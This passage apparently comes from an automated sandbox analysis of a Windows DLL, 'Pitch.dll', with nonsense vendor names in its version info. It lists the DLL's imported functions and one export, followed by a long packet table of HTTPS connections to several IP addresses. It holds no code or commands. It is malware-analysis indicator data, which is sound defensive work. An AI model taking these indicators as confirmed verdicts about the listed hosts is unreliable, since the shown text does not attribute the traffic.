KERNEL32.dll	SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, CloseHandle, CreateFileW, WriteConsoleW, SetConsoleCP, FindFirstChangeNotificationA, CreateFileA, GetCommandLineA, GetLocalTime, WriteFile, VirtualProtectEx, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RaiseException, RtlUnwind, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetProcessHeap, GetStdHandle, GetFileType, GetStringTypeW, DecodePointer
USER32.dll	GetWindowLongA, GetCursorPos, GetWindowTextLengthA, AppendMenuA, GetKeyNameTextA, DestroyIcon, SetFocus, IsDlgButtonChecked, GetClassInfoExA, RegisterClassExA, CallWindowProcA, DrawEdge, GetFocus
COMDLG32.dll	GetSaveFileNameA, GetOpenFileNameA, FindTextA
COMCTL32.dll	ImageList_SetDragCursorImage, ImageList_Remove, ImageList_AddMasked, ImageList_SetBkColor, ImageList_GetImageCount, ImageList_Destroy, ImageList_SetIconSize

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x10395d0

Version Infos

Description	Data
LegalCopyright	Teach plural Corporation. All rights reserved Silentthough
InternalName	Finger gentle
FileVersion	5.4.6.801
CompanyName	Teach plural Corporation
ProductName	Teach plural Glad
ProductVersion	5.4.6.801
FileDescription	Teach plural Glad
OriginalFilename	Pitch.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 3, 2021 20:58:51.670814991 CEST	49746	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:51.670840025 CEST	49747	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:51.716710091 CEST	443	49746	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:51.716734886 CEST	443	49747	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:51.716892958 CEST	49746	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:51.716983080 CEST	49747	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:51.772912025 CEST	49746	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:51.778378010 CEST	49747	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:51.818341970 CEST	443	49746	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:51.820715904 CEST	443	49746	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:51.820744991 CEST	443	49746	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:51.820817947 CEST	49746	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:51.820846081 CEST	49746	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:51.823225021 CEST	443	49747	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:51.824182034 CEST	443	49747	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:51.824202061 CEST	443	49747	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:51.824304104 CEST	49747	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:51.949436903 CEST	49746	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:51.950318098 CEST	49747	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:51.966208935 CEST	49746	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:51.966382027 CEST	49746	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:51.966449976 CEST	49747	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:51.992371082 CEST	443	49746	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:51.993042946 CEST	443	49746	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:51.993060112 CEST	443	49747	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:51.993073940 CEST	443	49746	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:51.993136883 CEST	49746	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:51.993174076 CEST	49746	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:51.993592978 CEST	443	49747	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:51.993608952 CEST	443	49747	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:51.993671894 CEST	49747	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:52.009133101 CEST	443	49746	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:52.009152889 CEST	443	49746	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:52.009161949 CEST	443	49747	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:52.010082006 CEST	443	49747	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:52.010164976 CEST	49747	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:52.012948990 CEST	443	49746	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:52.013047934 CEST	49746	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:52.035046101 CEST	443	49746	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:52.035074949 CEST	443	49746	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:52.035139084 CEST	49746	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:52.035168886 CEST	49746	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:52.063236952 CEST	49746	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:52.071084976 CEST	49747	443	192.168.2.4	104.20.185.68
Jun 3, 2021 20:58:52.147335052 CEST	443	49746	104.20.185.68	192.168.2.4
Jun 3, 2021 20:58:52.154717922 CEST	443	49747	104.20.185.68	192.168.2.4
Jun 3, 2021 20:59:09.494595051 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.494724989 CEST	49759	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.538289070 CEST	443	49759	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.538314104 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.538389921 CEST	49759	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.538434982 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.589471102 CEST	49759	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.590013027 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.633424997 CEST	443	49759	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.633934021 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.634116888 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.634135962 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.634150982 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.634201050 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.634228945 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.634248972 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.634299040 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.634355068 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.634402037 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.634593010 CEST	443	49759	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.634613037 CEST	443	49759	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.634628057 CEST	443	49759	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.634640932 CEST	49759	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.634669065 CEST	49759	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.634721994 CEST	443	49759	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.634759903 CEST	49759	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.634839058 CEST	443	49759	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.634876966 CEST	49759	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.736319065 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.737998009 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:09.738588095 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.738892078 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.739839077 CEST	49761	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:09.741723061 CEST	49762	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:09.745423079 CEST	49759	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.745851994 CEST	49759	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.779311895 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.779335976 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.779395103 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.781255960 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.781299114 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.781326056 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.783215046 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:09.783324003 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:09.783921003 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.783993959 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.784012079 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.784039021 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.784051895 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.784061909 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.784080982 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.784084082 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.784113884 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.784137011 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.784270048 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.784293890 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.784313917 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.784336090 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.784992933 CEST	443	49761	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:09.785063028 CEST	49761	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:09.786969900 CEST	443	49762	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:09.787054062 CEST	49762	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:09.788137913 CEST	443	49759	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.788160086 CEST	443	49759	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.788218021 CEST	49759	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.788261890 CEST	49759	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.788333893 CEST	443	49759	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.788378954 CEST	49759	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.822365999 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.822439909 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.822467089 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.822524071 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.825023890 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.825071096 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.825109005 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.825134039 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.825146914 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.825174093 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.825208902 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.827214003 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.827259064 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.827297926 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.827299118 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.827321053 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.827342987 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.827349901 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.827382088 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.827388048 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.827425957 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.827431917 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.827472925 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.827476978 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.827517986 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.827554941 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.827593088 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.827599049 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.827635050 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.827656984 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.827692986 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.827699900 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.827738047 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.827796936 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.827842951 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.827847004 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.827884912 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.827940941 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.827981949 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.866225958 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.866266012 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.866287947 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.866311073 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.866358995 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.866393089 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.868859053 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.868889093 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.868916035 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.868937969 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.868944883 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.868959904 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.868973970 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.869008064 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.869041920 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.869062901 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.869093895 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.869112968 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.869138956 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.869187117 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.869236946 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.871692896 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.871721983 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.871747971 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.871762991 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.871774912 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.871798038 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.871808052 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.871822119 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.871839046 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.871857882 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.871893883 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.871903896 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.871948957 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.871952057 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.871997118 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.872082949 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.872116089 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.872131109 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.872164965 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.872174978 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.872205973 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.872224092 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.872251987 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.872303963 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.872337103 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.872354031 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.872378111 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.872414112 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.872447014 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.872462034 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.872477055 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.872493982 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.872503996 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.872525930 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.872553110 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.872586966 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.872613907 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.872636080 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.872662067 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.872713089 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.872740030 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.872762918 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.872788906 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.872812986 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.872840881 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.872864008 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.872884035 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.872931957 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.872960091 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.872981071 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.873012066 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.873231888 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.873261929 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.873294115 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.873332977 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.901334047 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:09.901515961 CEST	49759	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.901740074 CEST	49761	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:09.902077913 CEST	49762	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:09.905576944 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.909831047 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.909878016 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.909914017 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.909920931 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.909941912 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.909954071 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.909970045 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.909995079 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.910007000 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.910042048 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.910068989 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.910104990 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.910119057 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.910150051 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.910183907 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.910231113 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.912467957 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.912508011 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.912548065 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.912553072 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.912585020 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.912585974 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.912616968 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.912623882 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.912638903 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.912672997 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.912693977 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.912740946 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.912776947 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.912796974 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.912837029 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.912875891 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.912888050 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.912921906 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.912940979 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.912976980 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.912988901 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.913024902 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.913052082 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.913105011 CEST	49758	443	192.168.2.4	87.248.118.22
Jun 3, 2021 20:59:09.947577953 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:09.948101997 CEST	443	49761	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:09.948131084 CEST	443	49762	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:09.948906898 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:09.948955059 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:09.948986053 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:09.948992968 CEST	443	49760	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:09.949013948 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:09.949043989 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:09.949743986 CEST	443	49761	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:09.949793100 CEST	443	49761	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:09.949826956 CEST	49761	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:09.949831963 CEST	443	49761	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:09.949873924 CEST	49761	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:09.949879885 CEST	49761	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:09.950210094 CEST	443	49762	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:09.950248957 CEST	443	49762	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:09.950283051 CEST	443	49762	151.101.1.44	192.168.2.4
Jun 3, 2021 20:59:09.950299978 CEST	49762	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:09.950341940 CEST	49762	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:09.950349092 CEST	49762	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:09.984000921 CEST	443	49759	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:09.988193989 CEST	443	49758	87.248.118.22	192.168.2.4
Jun 3, 2021 20:59:10.011672974 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.012197971 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.012465000 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.012588024 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.012705088 CEST	49760	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.015896082 CEST	49761	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.016320944 CEST	49761	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.019448042 CEST	49762	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.019843102 CEST	49762	443	192.168.2.4	151.101.1.44
Jun 3, 2021 20:59:10.057080030 CEST	443	49760	151.101.1.44	192.168.2.4
